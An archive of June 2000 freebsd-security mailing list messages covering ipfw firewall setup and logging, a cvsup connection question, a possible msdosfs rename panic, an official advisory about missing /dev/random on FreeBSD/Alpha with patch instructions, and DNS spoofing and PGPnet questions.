From owner-freebsd-security Sun Jun 11 10:23:22 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 64BEF37C90F for ; Sun, 11 Jun 2000 10:23:09 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id KAA06195; Sun, 11 Jun 2000 10:22:32 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda06193; Sun Jun 11 10:22:32 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id KAA05262; Sun, 11 Jun 2000 10:22:32 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdKX5260; Sun Jun 11 10:21:44 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.10.2/8.9.1) id e5BHLiX06847; Sun, 11 Jun 2000 10:21:44 -0700 (PDT) Message-Id: <200006111721.e5BHLiX06847@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdLg6843; Sun Jun 11 10:21:07 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.0-STABLE X-Sender: cy To: Greg Hormann Cc: security@FreeBSD.ORG Subject: Re: Setting up simple firewall with ipfw In-reply-to: Your message of "Sat, 10 Jun 2000 13:37:50 EDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sun, 11 Jun 2000 10:21:07 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , Greg Horm ann writes: > > I'm try to setup a simple little firewall for my stand alone FreeBSD-4.0 > box. Most of what I want seems to be working, but I'm having a few > problems I would appreciate some help with. (I'm *extremely* new to > firewalls.) > > > > 1) This box obtains its internet address via dhcp. Because of that, I've > been using "any to any via ed0". This box is dual homed, and at some > point in time I'd like to use natd to make this box a gateway for my > internal network. Is there a more secure way to set things up when using > dhcp? You can modify dhclient-script to alter your firewall whenever you get a new IP address via DHCP. > > > > 2) I can't get logging working to help me trouble shoot my problems. > (IPFIREWALL_VERBOSE is in the kernel.) -- It may works, and I don't know > where to look for it. Its not appear on the console, and after looking > and the man page, i still couldn't figure it out. > > sysctl net.inet.ip.fw returns: > > net.inet.ip.fw.enable: 1 > net.inet.ip.fw.one_pass: 1 > net.inet.ip.fw.debug: 1 > net.inet.ip.fw.verbose: 1 > net.inet.ip.fw.verbose_limit: 0 > net.inet.ip.fw.dyn_buckets: 256 > net.inet.ip.fw.curr_dyn_buckets: 256 > net.inet.ip.fw.dyn_count: 0 > net.inet.ip.fw.dyn_max: 1000 > net.inet.ip.fw.dyn_ack_lifetime: 300 > net.inet.ip.fw.dyn_syn_lifetime: 20 > net.inet.ip.fw.dyn_fin_lifetime: 20 > net.inet.ip.fw.dyn_rst_lifetime: 5 > net.inet.ip.fw.dyn_short_lifetime: 5 > > > > > 3) I'm having trouble getting ftp/ssh traffic through my firewall. (I can > get out, but not in.) When trying to ftp or ssh in, I receive "TCP/IP > Failure" > > I currently have the following rules: (Remember, I'm using dhcp hence so > many "any to any" > > 00100 108 7771 allow tcp from any to any via ed0 established > 00100 114 15516 allow ip from any to any via lo0 > 00200 1 44 allow tcp from any to any 25 via ed0 > 00200 0 0 deny ip from any to 127.0.0.0/8 > 00300 0 0 allow tcp from any to any 23 via ed0 > 00400 0 0 allow tcp from any to any 22 setup > 00500 0 0 allow udp from any to any 22 > 00600 0 0 allow tcp from any 22 to any > 00700 0 0 allow tcp from any to any 20 via ed0 > 00800 0 0 allow tcp from any to any 21 via ed0 > 00900 0 0 allow tcp from any to any 80 via ed0 > 01000 0 0 allow tcp from any to any 220 via ed0 > 01100 0 0 allow tcp from any to any 546 > 01200 0 0 allow udp from any to any 56 > 01300 4 176 allow tcp from any to any 110 > 01400 5 220 deny log tcp from any to any 1-1024 via ed0 > 65000 14 1701 allow ip from any to any > 65535 6 672 deny ip from any to any I'm not sure what you're trying to accomplish here -- the 22/udp is confusing, unless you want to allow PC Anywhere through. The FTP protocol is an abortion. You have a choice of passive or PORT FTP. Depending on the direction you will require opening up your firewall to the world or the worlds firewalls need to be opened up to FTP to you. In my IPFW and ipchains firewalls I specify that my users behind those firewall must use passive FTP as clients to get out. As FTP servers are a security risk I usually put them on a DMZ or exterior network. A packet filter with an FTP application proxy might let you have the best of both worlds. It just happens that IP Filter comes with FreeBSD as well. Even then, running an world accessible FTP server behind your firewall, IMO, is a still big risk, unless you're offering services to customers behind your firewall who themselves are also behind another firewall, onion ring approach of firewalls within firewalls within firewalls where outside rings have no access to or a very limited access to a set of services on the inside. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 12 3:26:41 2000 Delivered-To: freebsd-security@freebsd.org Received: from hormann.tzo.cc (cvg-29-15-234.cinci.rr.com [24.29.15.234]) by hub.freebsd.org (Postfix) with ESMTP id D28CE37B881 for ; Mon, 12 Jun 2000 03:26:35 -0700 (PDT) (envelope-from ghormann@alumni.indiana.edu) Received: from localhost (ghormann@localhost) by hormann.tzo.cc (8.9.3/8.9.3) with ESMTP id GAA01714; Mon, 12 Jun 2000 06:29:22 -0400 (EDT) (envelope-from ghormann@alumni.indiana.edu) X-Authentication-Warning: hormann.tzo.cc: ghormann owned process doing -bs Date: Mon, 12 Jun 2000 06:29:21 -0400 (EDT) From: Greg Hormann X-Sender: ghormann@hormann.tzo.cc To: Cy Schubert - ITSD Open Systems Group Cc: security@FreeBSD.ORG Subject: Re: Setting up simple firewall with ipfw In-Reply-To: <200006111721.e5BHLiX06847@cwsys.cwsent.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thanks. The FTP port was just to see if I could get it to work. Once I got it working, I shut it down. Greg. > > I'm not sure what you're trying to accomplish here -- the 22/udp is > confusing, unless you want to allow PC Anywhere through. > > The FTP protocol is an abortion. You have a choice of passive or PORT > FTP. Depending on the direction you will require opening up your > firewall to the world or the worlds firewalls need to be opened up to > FTP to you. In my IPFW and ipchains firewalls I specify that my users > behind those firewall must use passive FTP as clients to get out. As > FTP servers are a security risk I usually put them on a DMZ or exterior > network. > > A packet filter with an FTP application proxy might let you have the > best of both worlds. It just happens that IP Filter comes with FreeBSD > as well. Even then, running an world accessible FTP server behind your > firewall, IMO, is a still big risk, unless you're offering services to > customers behind your firewall who themselves are also behind another > firewall, onion ring approach of firewalls within firewalls within > firewalls where outside rings have no access to or a very limited > access to a set of services on the inside. > > > Regards, Phone: (250)387-8437 > Cy Schubert Fax: (250)387-5766 > Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca > Open Systems Group, ITSD, ISTA > Province of BC > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 12 5:42: 4 2000 Delivered-To: freebsd-security@freebsd.org Received: from www.lookanswer.com (www.lookanswer.com [195.66.202.98]) by hub.freebsd.org (Postfix) with ESMTP id 6A89B37CED3 for ; Mon, 12 Jun 2000 05:41:52 -0700 (PDT) (envelope-from havoc@lookanswer.com) Received: from lookanswer.com (pro.lookanswer.com [195.66.202.99]) by www.lookanswer.com (8.9.3/8.8.8) with ESMTP id PAA03778 for ; Mon, 12 Jun 2000 15:42:11 +0300 (EEST) (envelope-from havoc@lookanswer.com) Message-ID: <3944DA8F.4491CB6A@lookanswer.com> Date: Mon, 12 Jun 2000 15:41:51 +0300 From: Alex Koshterek X-Mailer: Mozilla 4.72 [en] (X11; I; FreeBSD 4.0-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: cvsup Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org When I try upgrade my system via cvsup (host: anoncvs.freebsd.org), I see: Connecting to anoncvs.FreeBSD.org Cannot connect to anoncvs.FreeBSD.org: Connection refused Will retry at ... Why? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 12 8:36:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193]) by hub.freebsd.org (Postfix) with ESMTP id C1C4F37B58C for ; Mon, 12 Jun 2000 08:36:40 -0700 (PDT) (envelope-from adam@algroup.co.uk) Received: from algroup.co.uk ([193.195.56.225]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id PAA14837; Mon, 12 Jun 2000 15:35:39 GMT Message-ID: <3945034B.90C4C6C0@algroup.co.uk> Date: Mon, 12 Jun 2000 16:35:39 +0100 From: Adam Laurie Organization: A.L. Group plc X-Mailer: Mozilla 4.72 [en] (Win95; U) X-Accept-Language: en MIME-Version: 1.0 To: Alex Koshterek Cc: freebsd-security@freebsd.org Subject: Re: cvsup References: <3944DA8F.4491CB6A@lookanswer.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Alex Koshterek wrote: > > When I try upgrade my system via cvsup (host: anoncvs.freebsd.org), > I see: > > Connecting to anoncvs.FreeBSD.org > Cannot connect to anoncvs.FreeBSD.org: Connection refused > Will retry at ... > > Why? and your security related question is...? cheers, Adam -- Adam Laurie Tel: +44 (181) 742 0755 A.L. Digital Ltd. Fax: +44 (181) 742 5995 Voysey House Barley Mow Passage http://www.aldigital.co.uk London W4 4GB mailto:adam@algroup.co.uk UNITED KINGDOM PGP key on keyservers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 12 8:55:55 2000 Delivered-To: freebsd-security@freebsd.org Received: from obie.softweyr.com (obie.softweyr.com [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 2107537B5D0 for ; Mon, 12 Jun 2000 08:55:48 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com (Foolstrustident!@homer.softweyr.com [204.68.178.39]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id JAA16586; Mon, 12 Jun 2000 09:55:26 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <394507FF.9C1F781D@softweyr.com> Date: Mon, 12 Jun 2000 09:55:43 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 4.0-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Alex Koshterek Cc: freebsd-security@FreeBSD.ORG Subject: Re: cvsup References: <3944DA8F.4491CB6A@lookanswer.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Alex Koshterek wrote: > > When I try upgrade my system via cvsup (host: anoncvs.freebsd.org), > I see: > > Connecting to anoncvs.FreeBSD.org > Cannot connect to anoncvs.FreeBSD.org: Connection refused > Will retry at ... > > Why? Perhaps because anoncvs.freebsd.org isn't a CVSup server? See section A.4.7 of the Handbook, CVSup Sites, at http://www.freebsd.org/handbook/mirrors-cvsup.html for help on choosing a CVSup server near you. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 12 12:14:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail-relay.eunet.no (mail-relay.eunet.no [193.71.71.242]) by hub.freebsd.org (Postfix) with ESMTP id 76C3137B8F4 for ; Mon, 12 Jun 2000 12:14:28 -0700 (PDT) (envelope-from mbendiks@eunet.no) Received: from login-1.eunet.no (login-1.eunet.no [193.75.110.2]) by mail-relay.eunet.no (8.9.3/8.9.3/GN) with ESMTP id VAA22967; Mon, 12 Jun 2000 21:14:22 +0200 (CEST) (envelope-from mbendiks@eunet.no) Received: from localhost (mbendiks@localhost) by login-1.eunet.no (8.9.3/8.8.8) with ESMTP id VAA00730; Mon, 12 Jun 2000 21:14:22 +0200 (CEST) (envelope-from mbendiks@eunet.no) X-Authentication-Warning: login-1.eunet.no: mbendiks owned process doing -bs Date: Mon, 12 Jun 2000 21:14:22 +0200 (CEST) From: Marius Bendiksen To: security@freebsd.org Cc: mbendiks@eunet.no Subject: msdosfs_vnops.c : msdosfs_rename() Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It would appear to me that, in the following section, there is the potential for a malicious user to cause a system panic. Could anyone confirm/disaffirm this? if (fvp == NULL) { /* * From name has disappeared */ if (doingdirectory) panic("rename: lost dir entry"); This is after rescanning the directory during a rename operation. Neither the directory, nor the entry, is locked at this point, according to the comments in the source. --- Marius Bendiksen To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 12 13: 9: 2 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailman.zeta.org.au (mailman.zeta.org.au [203.26.10.16]) by hub.freebsd.org (Postfix) with ESMTP id 6A9AE37B797 for ; Mon, 12 Jun 2000 13:08:56 -0700 (PDT) (envelope-from bde@zeta.org.au) Received: from bde.zeta.org.au (bde.zeta.org.au [203.2.228.102]) by mailman.zeta.org.au (8.8.7/8.8.7) with ESMTP id GAA26853; Tue, 13 Jun 2000 06:08:43 +1000 Date: Tue, 13 Jun 2000 06:08:42 +1000 (EST) From: Bruce Evans X-Sender: bde@besplex.bde.org To: Marius Bendiksen Cc: security@FreeBSD.ORG Subject: Re: msdosfs_vnops.c : msdosfs_rename() In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 12 Jun 2000, Marius Bendiksen wrote: > It would appear to me that, in the following section, there is the > potential for a malicious user to cause a system panic. Could anyone > confirm/disaffirm this? > > if (fvp == NULL) { > /* > * From name has disappeared > */ > if (doingdirectory) > panic("rename: lost dir entry"); No, this can only happen if there is a filesystem bug. > This is after rescanning the directory during a rename operation. Neither > the directory, nor the entry, is locked at this point, according to the > comments in the source. It is supposed to be locked by setting IN_RENAME in ip->i_flag. Note that IN_RENAME is only set in the doingdirectory case. I don't completely trust relookup(), however. In theory, the filesystem tree may be almost arbitrarily rearranged while relookup() sleeps, since relookup() doesn't hold many locks (in particular, it doesn't hold locks on the directories being changed or their parents or grandparents until it searches back down to them). I once made this happen in practice by forcing some long sleeps and doing the rearrangement in another process. There seemed to be problems, but I wasn't sure and have forgotten the details. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 12 14:51:56 2000 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id D1A3B37BBF7; Mon, 12 Jun 2000 14:51:44 -0700 (PDT) From: FreeBSD Security Advisories Subject: FreeBSD Security Advisory: FreeBSD-SA-00:25.alpha-dev-random Reply-To: security-advisories@freebsd.org From: FreeBSD Security Advisories Message-Id: <20000612215144.D1A3B37BBF7@hub.freebsd.org> Date: Mon, 12 Jun 2000 14:51:44 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:25 Security Advisory FreeBSD, Inc. Topic: FreeBSD/Alpha platform lacks kernel pseudo-random number generator, some applications fail to detect this. Category: core Module: kernel Announced: 2000-06-12 Affects: FreeBSD/Alpha prior to the correction date. Corrected: 2000-05-10 (4.0-STABLE) 2000-04-28 (5.0-CURRENT) FreeBSD only: Yes I. Background The FreeBSD kernel provides a cryptographic-strength pseudo-random number generator via the /dev/random and /dev/urandom interfaces, which samples hardware measurements to provide a high-quality source of "entropy" (randomness). II. Problem Description The FreeBSD port to the Alpha platform did not provide the /dev/random or /dev/urandom devices - this was an oversight during the development process which was not corrected before the Alpha port "became mainstream". FreeBSD/i386 is not affected. As a consequence, there is no way for Alpha systems prior to the correction date to obtain cryptographic-strength random numbers, unless an application "rolls its own" entropy gathering mechanism. This in itself is not a vulnerability, although it is an omission and a departure from the expected behaviour of a FreeBSD system. The actual vulnerability is that some applications fail to correctly check for a working /dev/random and do not exit with an error if it is not available, so this weakness goes undetected. OpenSSL 0.9.4, and utilities based on it, including OpenSSH (both of which are included in the base FreeBSD 4.0 system) are affected in this manner (this bug was corrected in OpenSSL 0.9.5) Therefore, cryptographic security systems on vulnerable FreeBSD/Alpha systems (including OpenSSH in the base FreeBSD 4.0 system) may have weakened strength, and cryptographic keys generated on such systems should not be trusted. III. Impact Cryptographic secrets (such as OpenSSH public/private keys) generated on FreeBSD/Alpha systems may be much weaker than their "advertised" strength, and may lead to data compromise to a dedicated and knowledgeable attacker. PGP/GnuPG keys, and keys generated by the SSH or SSH2 ports, are not believed to be weakened since that software will correctly detect the lack of a working /dev/random and use alternative sources of entropy. OpenSSH and OpenSSL are currently the only known vulnerable applications. IV. Workaround None available. V. Solution One of the following three options, followed by step 2). 1a) Upgrade your FreeBSD/Alpha system to FreeBSD 4.0-STABLE after the correction date. 1b) install the patched 4.0-RELEASE GENERIC kernel available from: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:25/kernel.gz e.g. perform the following steps as root: # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:25/kernel.gz # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:25/kernel.gz.asc [ Verify the detached PGP signature using your PGP utility - consult your utility's documentation for how to do this ] # gunzip kernel.gz # cp /kernel /kernel.old # chflags noschg /kernel # cp kernel /kernel # chflags schg /kernel 1c) Download the kernel source patch and rebuild your FreeBSD/Alpha kernel, as follows: # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:25/kernel.sys.diff Download the detached PGP signature: # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:25/kernel.sys.diff.asc and verify the signature using your PGP utility. Apply the patch: # cd /usr/src # patch -p < /path/to/kernel.sys.diff Rebuild your kernel as described in http://www.freebsd.org/handbook/kernelconfig.html and reboot with the new kernel. NOTE: Because of the significant improvements to the FreeBSD/Alpha platform in FreeBSD 4.0, it is not planned at this time to backport the necessary changes to FreeBSD 3.4-STABLE. 2) Immediately regenerate all OpenSSH-generated SSH keys and OpenSSL-generated SSL certificates, and any other data relying on cryptographic random numbers which were generated on FreeBSD/Alpha systems, whose strength cannot be verified. [Note: for most systems, the only significant vulnerability is likely to be from OpenSSH and OpenSSL-generated keys and certificates (e.g. for SSL webservers)] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBOUVa6lUuHi5z0oilAQG/VQP/bXSr0YdjwTVuHrc1JOTzKMqSJYyff50d 6Jg7VNL+X2B7hQcWUC8Rn/m+qy6byc9g51v8Wyk70olUs1Fy4bTGh+iEpE0mbQ45 tx75z/Uhq46fYP3ldBx9XvXJQxRHXrPos7gfTOVVdJcchIIgJdtxC7LfvOswbnvY EK+rxB2I9f8= =ee12 -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 12 18:42:49 2000 Delivered-To: freebsd-security@freebsd.org Received: from web210.mail.yahoo.com (web210.mail.yahoo.com [128.11.68.110]) by hub.freebsd.org (Postfix) with SMTP id EA99F37BCA6 for ; Mon, 12 Jun 2000 18:42:41 -0700 (PDT) (envelope-from hho321@yahoo.com) Received: (qmail 10943 invoked by uid 60001); 13 Jun 2000 01:42:37 -0000 Message-ID: <20000613014237.10942.qmail@web210.mail.yahoo.com> Received: from [207.172.11.148] by web210.mail.yahoo.com; Mon, 12 Jun 2000 18:42:37 PDT Date: Mon, 12 Jun 2000 18:42:37 -0700 (PDT) From: Hugh Ho Subject: IPFW rules for DNS? To: freebsd-security@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I need to do nslookup quite often, and I have the following IPFW rules which allow nslookup to talk to my ISP's DNS server: allow udp from ${my_ip} to ${dns_server} 53 allow udp from ${dns_server} 53 to ${my_ip} Problem with the above rules is that people can pass IPFW if they use UDP port 53 with a spoofed IP that matches my ISP's DNS server. Is there a way to fix my problem? Thanks. -Hugh __________________________________________________ Do You Yahoo!? Yahoo! Photos -- now, 100 FREE prints! http://photos.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 12 18:46:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from wat-border.sentex.ca (waterloo-hespler.sentex.ca [199.212.135.66]) by hub.freebsd.org (Postfix) with ESMTP id DA38C37B8D6 for ; Mon, 12 Jun 2000 18:46:25 -0700 (PDT) (envelope-from mike@sentex.net) Received: from granite.sentex.net (granite-atm.sentex.ca [209.112.4.1]) by wat-border.sentex.ca (8.9.3/8.9.3) with ESMTP id VAA95961; Mon, 12 Jun 2000 21:46:24 -0400 (EDT) (envelope-from mike@sentex.net) Received: from chimp (cage.simianscience.com [64.7.134.1]) by granite.sentex.net (8.8.8/8.6.9) with ESMTP id VAA08652; Mon, 12 Jun 2000 21:46:24 -0400 (EDT) Message-Id: <4.2.2.20000612213940.036c4ec0@mail.sentex.net> X-Sender: mdtancsa@mail.sentex.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 Date: Mon, 12 Jun 2000 21:42:05 -0400 To: Hugh Ho , freebsd-security@FreeBSD.ORG From: Mike Tancsa Subject: Re: IPFW rules for DNS? In-Reply-To: <20000613014237.10942.qmail@web210.mail.yahoo.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 06:42 PM 6/12/2000 -0700, Hugh Ho wrote: >I need to do nslookup quite often, and I have the following IPFW rules which >allow nslookup to talk to my ISP's DNS server: > > allow udp from ${my_ip} to ${dns_server} 53 > allow udp from ${dns_server} 53 to ${my_ip} > >Problem with the above rules is that people can pass IPFW if they use UDP port >53 with a spoofed IP that matches my ISP's DNS server. Is there a way to >fix my >problem? Sadly no. However, your ISP should be at least blocking spoofed addresses from the outside world from coming in to their network. But that does not of course prevent other users from inside from doing so. Make sure bind is running in its own sandbox in case you are not doing so already. ---Mike -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Network Administration, mike@sentex.net Sentex Communications www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 13 1:33:43 2000 Delivered-To: freebsd-security@freebsd.org Received: from dlt.follo.net (elde.org [195.204.143.185]) by hub.freebsd.org (Postfix) with ESMTP id 5308337BAEF for ; Tue, 13 Jun 2000 01:33:38 -0700 (PDT) (envelope-from terje@elde.net) Received: by dlt.follo.net (Postfix, from userid 1002) id 04BEB5F24F; Tue, 13 Jun 2000 10:33:30 +0200 (CEST) Date: Tue, 13 Jun 2000 10:33:30 +0200 From: Terje Elde To: "Alex N. Markelov" Cc: freebsd-security@FreeBSD.ORG Subject: Re: PGPnet Message-ID: <20000613103330.I3675@dlt.follo.net> References: <393E1EF4.91EF9861@futures.msk.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <393E1EF4.91EF9861@futures.msk.ru>; from amarkelov@futures.msk.ru on Wed, Jun 07, 2000 at 02:07:48PM +0400 X-Editor: Vim http://www.vim.org/ X-IRC: ircii!epic4-2000 - prevail[1214] X-Goal: Exterminate All Rational Thought Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Alex N. Markelov (amarkelov@futures.msk.ru) [000607 20:04]: > I have installed last international version of PGP 6.5.1i and want to > discover do we have any package under FreeBSD to work with other > computers securing comminucation with PGPnet. In 'what's new' of the > version of PGP I see it works with Cisco routers (IOS 12.0(4) and later > with IPsec TripleDES) and Linux FreeS/WAN. Do we have anything to work > with? Didn't see any replies on the list, so although a bit late, here I am. There is a chance you'll be able to get this up and running with static keying, but PGPNet seems awfully connection aware and want to chat with the IKE daemon running on the server before doing any secure work. The IKE daemon that go together with KAME (The IPsec stack FreeBSD is using) is called racoon, and has not been integrated into the base system yet. Several people are working on this though, but most of them seem to be pretty preoccupied, so I would not hold your breath if I were you. Terje To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 13 2:44: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from fulcrum.aist.com (fulcrum.aist.com [195.38.136.30]) by hub.freebsd.org (Postfix) with ESMTP id C84ED37BB30 for ; Tue, 13 Jun 2000 02:44:04 -0700 (PDT) (envelope-from kuliev@aist.com) Received: from mail.aist.com (mail.aist.com [192.168.0.2]) by fulcrum.aist.com (8.9.3/8.9.3) with ESMTP id LAA20366 for ; Tue, 13 Jun 2000 11:44:02 +0200 (CEST) Received: by mail.aist.com with Internet Mail Service (5.5.2650.21) id ; Tue, 13 Jun 2000 11:43:59 +0200 Message-ID: <414CE1396547D211945F00A0C99CF5004B57D9@mail.aist.com> From: Ilia Kuliev To: "'security@freebsd.org'" Subject: Date: Tue, 13 Jun 2000 11:43:58 +0200 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01BFD51B.E5D35990" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_001_01BFD51B.E5D35990 Content-Type: text/plain; charset="KOI8-R" list ------_=_NextPart_001_01BFD51B.E5D35990 Content-Type: text/html; charset="KOI8-R"

list

------_=_NextPart_001_01BFD51B.E5D35990-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 13 4:18: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from hormann.tzo.cc (cvg-29-15-234.cinci.rr.com [24.29.15.234]) by hub.freebsd.org (Postfix) with ESMTP id 0E28737BB29 for ; Tue, 13 Jun 2000 04:18:01 -0700 (PDT) (envelope-from ghormann@alumni.indiana.edu) Received: from localhost (ghormann@localhost) by hormann.tzo.cc (8.9.3/8.9.3) with ESMTP id HAA04612; Tue, 13 Jun 2000 07:20:45 -0400 (EDT) (envelope-from ghormann@alumni.indiana.edu) X-Authentication-Warning: hormann.tzo.cc: ghormann owned process doing -bs Date: Tue, 13 Jun 2000 07:20:41 -0400 (EDT) From: Greg Hormann X-Sender: ghormann@hormann.tzo.cc To: Scott Campbell Cc: security@freebsd.org Subject: Re: Setting up simple firewall with ipfw In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm an idiot. I screwed up /etc/syslogd.conf. Once I fixed that things started working fine. Thanks. Greg. On Mon, 12 Jun 2000, Scott Campbell wrote: > On Sat, 10 Jun 2000, Greg Hormann wrote: > > > 2) I can't get logging working to help me trouble shoot my problems. > > (IPFIREWALL_VERBOSE is in the kernel.) -- It may works, and I don't know > > where to look for it. Its not appear on the console, and after looking > > and the man page, i still couldn't figure it out. > > > > sysctl net.inet.ip.fw returns: > > > > net.inet.ip.fw.enable: 1 > > net.inet.ip.fw.one_pass: 1 > > net.inet.ip.fw.debug: 1 > > net.inet.ip.fw.verbose: 1 > > net.inet.ip.fw.verbose_limit: 0 *********Probably the problem***** > > net.inet.ip.fw.dyn_buckets: 256 > > net.inet.ip.fw.curr_dyn_buckets: 256 > > net.inet.ip.fw.dyn_count: 0 > > net.inet.ip.fw.dyn_max: 1000 > > net.inet.ip.fw.dyn_ack_lifetime: 300 > > net.inet.ip.fw.dyn_syn_lifetime: 20 > > net.inet.ip.fw.dyn_fin_lifetime: 20 > > net.inet.ip.fw.dyn_rst_lifetime: 5 > > net.inet.ip.fw.dyn_short_lifetime: 5 > > > > > It sounds like your other problems are being delt with by the group but I > thought I would let you know about logging. > > In the kernel setup do you have a > > option IPFIREWALL_VERBOSE_LIMIT=??? > > line? I use 500 just so I don't get flooded when I turn it on. It (ipfw > man pg/LINT) doesn't say you _need_ it but I like to use it. The default > on the limit is 0 if you don't give it a value. I am not sure if you can > set this to log forever but I am sure you could work out a system of > turning your logs each night and reseting the counters if you were so > inclined. > > In syslog.conf you need 